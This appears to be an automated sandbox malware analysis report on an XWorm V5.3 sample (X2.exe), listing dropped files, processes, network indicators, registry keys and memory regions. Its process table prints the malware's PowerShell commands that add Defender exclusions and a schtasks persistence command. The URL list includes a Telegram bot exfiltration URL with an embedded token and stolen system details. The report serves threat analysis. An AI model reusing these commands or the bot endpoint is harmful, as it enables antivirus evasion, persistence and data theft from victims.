Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
X2.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pfdzrbz.hmr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twhqbul.0cj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ykowicr.nig.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a3xxvqq.fu3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5nbalah.m0p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j55kqhiw.eag.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nizxkupe.dmm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oojkmklw.2fk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rubhzaz3.ru5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sk4mmj53.3yj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0dxijgf.tcm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1o5dnxb.rve.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf4gnsri.10x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upvh04it.zrg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0z0f4qt.bvs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykqx4vzq.mom.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:54:18
2024, mtime=Tue Apr 23 23:54:18 2024, atime=Tue Apr 23 23:54:18 2024, length=50688, window=hide
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\X2.exe
|
"C:\Users\user\Desktop\X2.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X2.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X2.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
"C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
"C:\Users\user\AppData\Roaming\explorer.exe"
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
C:\Users\user\AppData\Roaming\explorer.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
91.92.252.220
|
|||
127.0.0.1
|
|||
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=96664
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://crl.m3
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://api.telegrP
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0ABCC62BF1F171CE9AAF13%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FS1PX1XW%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3
|
149.154.167.220
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ip-api.com
|
208.95.112.1
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
91.92.252.220
|
unknown
|
Bulgaria
|
||
127.0.0.1
|
unknown
|
unknown
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X2_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
explorer
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2C01000
|
trusted library allocation
|
page read and write
|
||
2BCB000
|
trusted library allocation
|
page read and write
|
||
2B61000
|
trusted library allocation
|
page read and write
|
||
852000
|
unkown
|
page readonly
|
||
196DB8A1000
|
trusted library allocation
|
page read and write
|
||
91F6EFD000
|
stack
|
page read and write
|
||
7FFE7E590000
|
trusted library allocation
|
page read and write
|
||
4F1000
|
stack
|
page read and write
|
||
1B4D0000
|
heap
|
page read and write
|
||
7FFE7E1E3000
|
trusted library allocation
|
page execute and read and write
|
||
196F25C5000
|
heap
|
page read and write
|
||
7FFE7E391000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
196DB70E000
|
trusted library allocation
|
page read and write
|
||
82A000
|
heap
|
page read and write
|
||
1C301869000
|
trusted library allocation
|
page read and write
|
||
7FFE7E244000
|
trusted library allocation
|
page read and write
|
||
1425000
|
heap
|
page read and write
|
||
7FFE7E680000
|
trusted library allocation
|
page read and write
|
||
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
196DB700000
|
trusted library allocation
|
page read and write
|
||
7DF40F6D0000
|
trusted library allocation
|
page execute and read and write
|
||
1CC0E000
|
stack
|
page read and write
|
||
7FFE7E3BA000
|
trusted library allocation
|
page read and write
|
||
91F65B3000
|
stack
|
page read and write
|
||
110E000
|
stack
|
page read and write
|
||
6E1000
|
heap
|
page read and write
|
||
1E8649A0000
|
heap
|
page read and write
|
||
196F21D8000
|
heap
|
page read and write
|
||
7FFE7E3F0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E490000
|
trusted library allocation
|
page read and write
|
||
7FFE7E63D000
|
trusted library allocation
|
page read and write
|
||
1E84DBB9000
|
trusted library allocation
|
page read and write
|
||
1C3796E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E380000
|
trusted library allocation
|
page read and write
|
||
7FFE7E520000
|
trusted library allocation
|
page read and write
|
||
2BAA000
|
trusted library allocation
|
page read and write
|
||
7FFE7E5D0000
|
trusted library allocation
|
page read and write
|
||
1520000
|
heap
|
page execute and read and write
|
||
120F000
|
stack
|
page read and write
|
||
12353000
|
trusted library allocation
|
page read and write
|
||
2C8C000
|
trusted library allocation
|
page read and write
|
||
7FFE7E5A0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
16D16C84000
|
heap
|
page read and write
|
||
7FFE7E5F0000
|
trusted library allocation
|
page read and write
|
||
91F000
|
stack
|
page read and write
|
||
FC0000
|
heap
|
page execute and read and write
|
||
1E84D8BD000
|
trusted library allocation
|
page read and write
|
||
1CF0B000
|
stack
|
page read and write
|
||
1CD0A000
|
stack
|
page read and write
|
||
1C310001000
|
trusted library allocation
|
page read and write
|
||
1E84DAD4000
|
trusted library allocation
|
page read and write
|
||
A52B94A000
|
stack
|
page read and write
|
||
7FFE7E306000
|
trusted library allocation
|
page execute and read and write
|
||
1BA3D000
|
heap
|
page read and write
|
||
6B2773000
|
stack
|
page read and write
|
||
7FFE7E4E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4D0000
|
trusted library allocation
|
page read and write
|
||
196DBB54000
|
trusted library allocation
|
page read and write
|
||
7FFE7E520000
|
trusted library allocation
|
page read and write
|
||
91F65FF000
|
stack
|
page read and write
|
||
196D812E000
|
heap
|
page read and write
|
||
7FFE7E3C0000
|
trusted library allocation
|
page read and write
|
||
16D30BEB000
|
heap
|
page read and write
|
||
196E9DE1000
|
trusted library allocation
|
page read and write
|
||
1C377E76000
|
heap
|
page read and write
|
||
1E84A751000
|
heap
|
page read and write
|
||
1BB8E000
|
stack
|
page read and write
|
||
1C30130A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E543000
|
trusted library allocation
|
page read and write
|
||
1C377E8E000
|
heap
|
page read and write
|
||
1C379EA0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E470000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E440000
|
trusted library allocation
|
page read and write
|
||
12B0000
|
heap
|
page read and write
|
||
22E0000
|
heap
|
page read and write
|
||
1B19E000
|
stack
|
page read and write
|
||
1E84A799000
|
heap
|
page read and write
|
||
16D16C00000
|
heap
|
page read and write
|
||
6B2BFE000
|
stack
|
page read and write
|
||
1C2B3000
|
stack
|
page read and write
|
||
566000
|
heap
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
1C379710000
|
heap
|
page readonly
|
||
7FFE7E564000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4D0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E600000
|
trusted library allocation
|
page read and write
|
||
1E85C371000
|
trusted library allocation
|
page read and write
|
||
16D19EDF000
|
trusted library allocation
|
page read and write
|
||
15B5B7F000
|
stack
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
15B674C000
|
stack
|
page read and write
|
||
16D16C07000
|
heap
|
page read and write
|
||
7FFE7E5F0000
|
trusted library allocation
|
page read and write
|
||
F93000
|
trusted library allocation
|
page read and write
|
||
2EEE000
|
stack
|
page read and write
|
||
7FFE7E230000
|
trusted library allocation
|
page read and write
|
||
1C300001000
|
trusted library allocation
|
page read and write
|
||
7FFE7E440000
|
trusted library allocation
|
page read and write
|
||
2F91000
|
trusted library allocation
|
page read and write
|
||
7FFE7E500000
|
trusted library allocation
|
page read and write
|
||
16D18730000
|
heap
|
page read and write
|
||
16D28791000
|
trusted library allocation
|
page read and write
|
||
91F6E7E000
|
stack
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
196F25DF000
|
heap
|
page read and write
|
||
7FFE7E3C1000
|
trusted library allocation
|
page read and write
|
||
244D000
|
trusted library allocation
|
page read and write
|
||
7FFE7E568000
|
trusted library allocation
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
1E84D2BB000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3E2000
|
trusted library allocation
|
page read and write
|
||
15B5979000
|
stack
|
page read and write
|
||
16D3076F000
|
heap
|
page read and write
|
||
1E84A710000
|
heap
|
page read and write
|
||
7FFE7E320000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E2F6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E533000
|
trusted library allocation
|
page read and write
|
||
196D8210000
|
heap
|
page read and write
|
||
7FFE7E530000
|
trusted library allocation
|
page read and write
|
||
2100000
|
trusted library allocation
|
page read and write
|
||
6B2E37000
|
stack
|
page read and write
|
||
7FFE7E4F0000
|
trusted library allocation
|
page read and write
|
||
18B84E58000
|
heap
|
page read and write
|
||
6F0000
|
heap
|
page read and write
|
||
5B5000
|
heap
|
page read and write
|
||
A52AB77000
|
stack
|
page read and write
|
||
1C379790000
|
trusted library allocation
|
page read and write
|
||
800000
|
trusted library allocation
|
page read and write
|
||
196D8300000
|
trusted library allocation
|
page read and write
|
||
1C30133D000
|
trusted library allocation
|
page read and write
|
||
2CAF000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4E0000
|
trusted library allocation
|
page read and write
|
||
196D8260000
|
trusted library section
|
page read and write
|
||
12351000
|
trusted library allocation
|
page read and write
|
||
196D8010000
|
heap
|
page read and write
|
||
7FFE7E300000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E5EC000
|
trusted library allocation
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
7FFE7E4F0000
|
trusted library allocation
|
page read and write
|
||
196F25D8000
|
heap
|
page read and write
|
||
7FFE7E1F0000
|
trusted library allocation
|
page read and write
|
||
4DE3E79000
|
stack
|
page read and write
|
||
1E84CF87000
|
trusted library allocation
|
page read and write
|
||
1C3796D0000
|
trusted library section
|
page read and write
|
||
7FFE7E65D000
|
trusted library allocation
|
page read and write
|
||
16D16C86000
|
heap
|
page read and write
|
||
7FFE7E542000
|
trusted library allocation
|
page read and write
|
||
18B84E50000
|
heap
|
page read and write
|
||
18B85110000
|
heap
|
page read and write
|
||
196DB713000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3E4000
|
trusted library allocation
|
page read and write
|
||
12F98000
|
trusted library allocation
|
page read and write
|
||
1C300088000
|
trusted library allocation
|
page read and write
|
||
10F1000
|
stack
|
page read and write
|
||
7FFE7E3E0000
|
trusted library allocation
|
page read and write
|
||
1AE10000
|
heap
|
page read and write
|
||
7FFE7E63D000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2D6000
|
trusted library allocation
|
page read and write
|
||
2C66000
|
trusted library allocation
|
page read and write
|
||
1C5CD000
|
heap
|
page read and write
|
||
196DB808000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1E2000
|
trusted library allocation
|
page read and write
|
||
7FFE7E230000
|
trusted library allocation
|
page read and write
|
||
91F79CE000
|
stack
|
page read and write
|
||
7DF43E410000
|
trusted library allocation
|
page execute and read and write
|
||
196D8280000
|
trusted library allocation
|
page read and write
|
||
7FFE7E600000
|
trusted library allocation
|
page read and write
|
||
196DB7BF000
|
trusted library allocation
|
page read and write
|
||
7FFE7E420000
|
trusted library allocation
|
page read and write
|
||
1C300A52000
|
trusted library allocation
|
page read and write
|
||
1D00B000
|
stack
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
196F22F0000
|
heap
|
page read and write
|
||
7FFE7E5F0000
|
trusted library allocation
|
page read and write
|
||
16D18650000
|
trusted library allocation
|
page read and write
|
||
91F69F9000
|
stack
|
page read and write
|
||
7FFE7E1E4000
|
trusted library allocation
|
page read and write
|
||
16D30D57000
|
heap
|
page execute and read and write
|
||
6DE000
|
heap
|
page read and write
|
||
1C377DF5000
|
heap
|
page read and write
|
||
196DB6F2000
|
trusted library allocation
|
page read and write
|
||
16D18610000
|
heap
|
page readonly
|
||
1C377EB7000
|
heap
|
page read and write
|
||
7FFE7E1E4000
|
trusted library allocation
|
page read and write
|
||
196D9FD8000
|
trusted library allocation
|
page read and write
|
||
7FFE7E440000
|
trusted library allocation
|
page read and write
|
||
525000
|
heap
|
page read and write
|
||
7FFE7E3A0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E580000
|
trusted library allocation
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
16D30FB2000
|
heap
|
page read and write
|
||
15B5333000
|
stack
|
page read and write
|
||
7FFE7E3C8000
|
trusted library allocation
|
page read and write
|
||
1C301E27000
|
trusted library allocation
|
page read and write
|
||
1C301387000
|
trusted library allocation
|
page read and write
|
||
7FFE7E510000
|
trusted library allocation
|
page read and write
|
||
1000000
|
heap
|
page read and write
|
||
196DBA18000
|
trusted library allocation
|
page read and write
|
||
1E864B41000
|
heap
|
page read and write
|
||
7FFE7E220000
|
trusted library allocation
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
7FFE7E382000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1FB000
|
trusted library allocation
|
page read and write
|
||
1140000
|
heap
|
page read and write
|
||
2BE7000
|
trusted library allocation
|
page read and write
|
||
15B58FD000
|
stack
|
page read and write
|
||
1E84C0C0000
|
heap
|
page read and write
|
||
2490000
|
heap
|
page read and write
|
||
6B30BE000
|
stack
|
page read and write
|
||
7FFE7E4B0000
|
trusted library allocation
|
page read and write
|
||
6B27FD000
|
stack
|
page read and write
|
||
1C60B000
|
heap
|
page read and write
|
||
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
1E85C643000
|
trusted library allocation
|
page read and write
|
||
7FFE7E540000
|
trusted library allocation
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
1B15F000
|
stack
|
page read and write
|
||
1C3BC000
|
stack
|
page read and write
|
||
16D18C2D000
|
trusted library allocation
|
page read and write
|
||
196DBB4B000
|
trusted library allocation
|
page read and write
|
||
196D8080000
|
heap
|
page read and write
|
||
7FFE7E2D0000
|
trusted library allocation
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
196DB630000
|
trusted library allocation
|
page read and write
|
||
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
7FFE7E212000
|
trusted library allocation
|
page read and write
|
||
1B9FC000
|
heap
|
page read and write
|
||
15B5AF8000
|
stack
|
page read and write
|
||
16D18750000
|
heap
|
page read and write
|
||
7FFE7E3F0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E240000
|
trusted library allocation
|
page read and write
|
||
7FFE7E54A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E660000
|
trusted library allocation
|
page read and write
|
||
7FFE7E650000
|
trusted library allocation
|
page read and write
|
||
7FFE7E27C000
|
trusted library allocation
|
page execute and read and write
|
||
196DB624000
|
trusted library allocation
|
page read and write
|
||
11DE000
|
heap
|
page read and write
|
||
7FFE7E620000
|
trusted library allocation
|
page read and write
|
||
681000
|
heap
|
page read and write
|
||
6B3B8C000
|
stack
|
page read and write
|
||
1E84D471000
|
trusted library allocation
|
page read and write
|
||
1C60D000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
1C379DF3000
|
heap
|
page read and write
|
||
7FFE7E4E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E24C000
|
trusted library allocation
|
page execute and read and write
|
||
1B95F000
|
stack
|
page read and write
|
||
196DB615000
|
trusted library allocation
|
page read and write
|
||
1C377E7C000
|
heap
|
page read and write
|
||
196F21F0000
|
trusted library allocation
|
page read and write
|
||
196D8065000
|
heap
|
page read and write
|
||
1C3799A0000
|
heap
|
page execute and read and write
|
||
1BAD8000
|
heap
|
page read and write
|
||
196DB673000
|
trusted library allocation
|
page read and write
|
||
1C310021000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4C0000
|
trusted library allocation
|
page read and write
|
||
196DB2CE000
|
trusted library allocation
|
page read and write
|
||
1B9E2000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
196DBBA4000
|
trusted library allocation
|
page read and write
|
||
1E84D560000
|
trusted library allocation
|
page read and write
|
||
7FFE7E513000
|
trusted library allocation
|
page read and write
|
||
11DB000
|
heap
|
page read and write
|
||
652000
|
heap
|
page read and write
|
||
7FFE7E29C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E4A0000
|
trusted library allocation
|
page read and write
|
||
16D28761000
|
trusted library allocation
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
16D28781000
|
trusted library allocation
|
page read and write
|
||
7DF409F60000
|
trusted library allocation
|
page execute and read and write
|
||
9AE000
|
stack
|
page read and write
|
||
1110000
|
heap
|
page read and write
|
||
196D80C4000
|
heap
|
page read and write
|
||
196F256C000
|
heap
|
page read and write
|
||
114C000
|
heap
|
page read and write
|
||
67E000
|
heap
|
page read and write
|
||
7FFE7E390000
|
trusted library allocation
|
page read and write
|
||
196DB619000
|
trusted library allocation
|
page read and write
|
||
1C377E30000
|
heap
|
page read and write
|
||
243F000
|
stack
|
page read and write
|
||
1E84D065000
|
trusted library allocation
|
page read and write
|
||
16D19796000
|
trusted library allocation
|
page read and write
|
||
196DAD53000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2CC000
|
trusted library allocation
|
page execute and read and write
|
||
196E9E1C000
|
trusted library allocation
|
page read and write
|
||
196F2137000
|
heap
|
page read and write
|
||
7FFE7E550000
|
trusted library allocation
|
page read and write
|
||
1C377DF0000
|
heap
|
page read and write
|
||
7FFE7E3CA000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3C0000
|
trusted library allocation
|
page execute and read and write
|
||
1C300C07000
|
trusted library allocation
|
page read and write
|
||
7FFE7E660000
|
trusted library allocation
|
page read and write
|
||
6B2B79000
|
stack
|
page read and write
|
||
196D9DA0000
|
heap
|
page execute and read and write
|
||
7FFE7E5D0000
|
trusted library allocation
|
page read and write
|
||
16D18600000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1C3102E9000
|
trusted library allocation
|
page read and write
|
||
1E84A796000
|
heap
|
page read and write
|
||
7FFE7E390000
|
trusted library allocation
|
page read and write
|
||
7FFE7E570000
|
trusted library allocation
|
page read and write
|
||
16D30BC0000
|
heap
|
page read and write
|
||
7FFE7E650000
|
trusted library allocation
|
page read and write
|
||
1B930000
|
heap
|
page read and write
|
||
16D31029000
|
heap
|
page read and write
|
||
7FFE7E3D0000
|
trusted library allocation
|
page execute and read and write
|
||
196D8340000
|
trusted library allocation
|
page read and write
|
||
1178000
|
heap
|
page read and write
|
||
1B6DF000
|
stack
|
page read and write
|
||
9A1000
|
stack
|
page read and write
|
||
7FFE7E4C0000
|
trusted library allocation
|
page read and write
|
||
2C44000
|
trusted library allocation
|
page read and write
|
||
2C4E000
|
trusted library allocation
|
page read and write
|
||
1E84CF4F000
|
trusted library allocation
|
page read and write
|
||
16D196FD000
|
trusted library allocation
|
page read and write
|
||
16D16BC0000
|
heap
|
page read and write
|
||
7FFE7E4A1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E470000
|
trusted library allocation
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
7FFE7E232000
|
trusted library allocation
|
page read and write
|
||
7FFE7E680000
|
trusted library allocation
|
page read and write
|
||
196DB984000
|
trusted library allocation
|
page read and write
|
||
7FFE7E636000
|
trusted library allocation
|
page read and write
|
||
196D8295000
|
heap
|
page read and write
|
||
16D310C0000
|
trusted library allocation
|
page read and write
|
||
15B5BFE000
|
stack
|
page read and write
|
||
7FFE7E213000
|
trusted library allocation
|
page execute and read and write
|
||
6B2CFD000
|
stack
|
page read and write
|
||
7FFE7E3B0000
|
trusted library allocation
|
page read and write
|
||
196F24EE000
|
heap
|
page read and write
|
||
A52ABFA000
|
stack
|
page read and write
|
||
16D31021000
|
heap
|
page read and write
|
||
1E84D654000
|
trusted library allocation
|
page read and write
|
||
1E85C351000
|
trusted library allocation
|
page read and write
|
||
1C301E02000
|
trusted library allocation
|
page read and write
|
||
7FFE7E630000
|
trusted library allocation
|
page read and write
|
||
16D30F66000
|
heap
|
page read and write
|
||
A52AD7E000
|
stack
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
1E864B06000
|
heap
|
page read and write
|
||
1E84D40E000
|
trusted library allocation
|
page read and write
|
||
7FFE7E296000
|
trusted library allocation
|
page read and write
|
||
15B5779000
|
stack
|
page read and write
|
||
7FFE7E545000
|
trusted library allocation
|
page read and write
|
||
196D8270000
|
trusted library section
|
page read and write
|
||
63B000
|
heap
|
page read and write
|
||
7FFE7E550000
|
trusted library allocation
|
page read and write
|
||
7FFE7E400000
|
trusted library allocation
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
91F6F7E000
|
stack
|
page read and write
|
||
A52A5DE000
|
stack
|
page read and write
|
||
7FFE7E562000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4A0000
|
trusted library allocation
|
page read and write
|
||
1BE1E000
|
stack
|
page read and write
|
||
7FFE7E534000
|
trusted library allocation
|
page read and write
|
||
6B3B0E000
|
stack
|
page read and write
|
||
7FFE7E2E6000
|
trusted library allocation
|
page execute and read and write
|
||
196DBBB2000
|
trusted library allocation
|
page read and write
|
||
196DB707000
|
trusted library allocation
|
page read and write
|
||
15B68CC000
|
stack
|
page read and write
|
||
16D30D50000
|
heap
|
page execute and read and write
|
||
7FFE7E4D0000
|
trusted library allocation
|
page read and write
|
||
196DB6F4000
|
trusted library allocation
|
page read and write
|
||
1B99E000
|
stack
|
page read and write
|
||
1AF1E000
|
stack
|
page read and write
|
||
1E84DCB4000
|
trusted library allocation
|
page read and write
|
||
196F20FB000
|
heap
|
page read and write
|
||
196D9C2D000
|
heap
|
page read and write
|
||
1E864748000
|
heap
|
page read and write
|
||
12F93000
|
trusted library allocation
|
page read and write
|
||
